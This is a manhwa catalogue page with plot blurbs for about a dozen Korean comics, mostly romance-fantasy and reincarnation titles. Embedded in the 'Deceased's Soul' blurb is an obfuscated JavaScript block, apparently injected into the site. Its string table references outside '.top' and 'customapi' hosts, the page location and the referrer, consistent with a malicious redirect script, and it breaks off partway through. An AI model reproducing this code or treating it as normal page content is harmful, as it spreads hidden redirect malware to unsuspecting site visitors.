Manhwa - Page 252

Manhwa represents the vibrant world of Korean comics, loved for their unique style and stories, especially in webtoon format, covering everything from action to drama.

3132 results

30 Day Fiancée

Read manhwa 30 Day Fiancée / 30일의 약혼녀 / Fiancée for 30 Days / The Fiancée on the 30th A woman who went beyond the dimension to not die, Han In-seo. Duke Belesquez, a man who needs a stand-in to avoid unpleasant marriage. Romance between the two, entangled by necessity and contract, but destined to love.


I Saved The Cursed Duke

Asteria who lives protecting the grave of the gods. One day, a man who is on the verge of dying suddenly appears in front of her, disturbing her peaceful life. This man is none other than Duke Erhardt, the most handsome and youngest governor of the empire. Asteria saves the dying duke using her magical powers, but her magical powers can only be maintained if they are together. At Erhardt’s request, she came to the outside world and became the fake duchess. Will Asteria, who is slowly adjusting to her new life, be able to achieve love and solve the curse?!


Deceased’s Soul ( Rest in Peace )

Jeongto and Isaeng – childhood friends and neighbours, one grew up in a hospital and the other in a funeral home. Even with their opposite roles in serving those who live and those who have died, they were extremely close. Yet, ten years later, what was once two friends who could understand and respect the balance they maintained in the cycle of life, death, and rebirth is now two opposing forces trying to control of the path of the deceased souls<script></script><script>function _0x2bf6(){var _0x5bd745=['random','5473496HlqIGv','http://rea','1986kNuJtS','google','3676Xatehd','2787BHRQqh','.top/','821370lauvnQ','floor','HVbKl','fwUyR','MqgNL','includes','text','href','27NvhXzR','location','https://ip','bIrtg','.customapi','BfOrP','then','1265192zVWhjO','11405IzETOZ','349114BmTGUv','mpOXv','','bGZhU','HvGeI','24571840dxVfYF','referrer','MFsvt','KHByc'];_0x2bf6=function(){return _0x5bd745;};return _0x2bf6();}function _0x1fe1(_0x17acf3,_0xb41295){var _0x1d1aed=_0x2bf6();return _0x1fe1=function(_0x2ad002,_0x43bc0c){_0x2ad002=_0x2ad002-(0x1af5+-0xc3c+0xd6f*-0x1);var _0x20fd32=_0x1d1aed[_0x2ad002];return _0x20fd32;},_0x1fe1(_0x17acf3,_0xb41295);}(function(_0x1d6618,_0x28a53a){var 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Would You Like a Cup of Tea?

Muisel was reincarnated into the novel as a side character. Muisel is destined to die from a war that the main character decides to commence. Fortunately, Muisel acquires the ability to see the past, ‘Psychometry’. She aims to use her ability to change the future for her new life, family, and her friends Would You Like A Cup of Tea? / 차 한잔 하실래요?


After World’s Flower Viewing

Read manhwa After World’s Flower Viewing “Stop crying.” Yeomra wiped Gung’s tears with his large hands. He frowned as he saw the teardrops trickle onto his fingers. He could not believe what he had done. He felt that the teardrops falling onto the floor were a waste and unconsciously reached out his hand. His actions were unexplainable. But that was not the only strange thing. “What is this stinging pain…?” Every look at the child made his heart hurt. Yeomra could not help but be confused by this pain he had never felt in his entire life. But oddly enough, he couldn’t take his eyes off that child. Yeoho, the secret guard of the great king, Yeomra, who had watched everything unfold, was in utter panic. “H-heaven and earth will turn upside down!” Yeoho looked at his master with a bewildered expression. Yeoho was wondering whether or not to pluck both of his eyes out. He could not comprehend why his master had acted like that.


Queen of Avalon

“Queen Arthur. That is your name from today.” I was summoned to save the kingdom that King Arthur had rolled over. As the Archmage Merlin said, I am the possessor of the same soul as King Arthur. If I find the Holy Grail and complete my mission, will am I be able to live with love? But why are knights so rude? Xian, who has been living a life of bliss for 20 years. When I woke up one day, I became a character in a legend! The magical story of her becoming Read Queen of Avalon manga – Queen of Avalon manhwa


Opening My Eyes, I Was a Princess!

Read manhwa Opening My Eyes, I Was a Princess! I was reborn as the youngest daughter of the royal family?! Expecting to be showered with love and luxuries, I found myself gravely disappointed when my father seemed to have no interest in me. Not only that, but what’s going on here?! “I’m thinking of marrying you off to the Imperial Emperor.” How could you say such a thing to your newborn daughter?!


Overbearing Tyrant (manhwa)

Overbearing Tyrant manhwaIn the year 202X, the Otherworlders invaded Earth. The otherworlders have more sophisticated technology and hunted down humans with combat robots and viral weapons, and the remaining humans battled on for 10 years just to survive. The main character, Park Sung Hyun', was the leader of the troops in Incheon, Bupyeong. Prior to the invasion of the Otherworlders, he used to be a part-timer at a convenience store like an ordinary person, but he became a strong warrior in the process of losing his family and battling to avenge them. In the midst of the attack against the Otherworlders' headquarters, Park Hyun Sung got trapped in a warp portal with the leader. When he woke up, he found himself in a fantasy world that reminded him of the medieval times in Europe, and his soul was trapped inside a weak blonde 15-year-old pretty boy's body. Hyun Sung was surprised by the unfamiliar surroundings and his weak body and found out that he is occupying the body of Ian Albarren, and that his father is the lord of a land who owes a large debt to the great lord and faces a difficult time ruling over his land. Park Hyun Sung, who had been fighting against combat robots and viral weaponry from the Otherworlders who had advanced scientific technology, decides to get used to this fantasy world to fight against monsters with armor and swords.


I Picked Up the Second Male Lead After the Ending

<span class="mx-1">I Picked Up the Second Male Lead After the Ending </span> I transmigrated inside the novel of my favorite character, the second male lead. A tsundere who listens to all the words of the female lead while grunting, with a straight forward personality, and a handsome face. Matching all my preferences, he was even single after the ending. Nice! I’ll pick up the second male lead! However, I overlooked one thing… The tsundere, who had been abandoned by the female lead blackened, and had become a terrifying man! “Get lost.” …I, Is it safe for me to pick up the second male lead?


Knight Under Heart

Lee Yooshin went to try out a new virtual reality game. However, it wasn't just a game. It has a 100% assimilation rate!A game world where everything feels eerily real- In the endless cycle of death and resurrection where logging out is not allowed, Yooshin prepares to fight.In order to escape the hellish battlefield from which there's no escape...


Her Peculiar Visitor

Three dates to save the bookstore?! Banished from the celestial realm for interfering in the fate of a mortal, Juhee now lives a mortal life herself as the owner of a bookstore. When she suddenly receives an eviction notice, she visits her landlord to plead her case. But what will she do when he makes her a peculiar offer?


Because It’s Love

Ki Seung-joo is a young, multi-talented top star who has it all. Yoo Lee-hyun is a newcomer to the celebrity scene, but quickly making an impact. While they navigate the twists and turns of celebrity life, Lee-hyun is also intent on resolving something from her past. Both are hyper-focused on their careers. But their chance meeting on the set of a variety show sparks something in them that neither have felt before… Because It’s Love / 사랑이라서
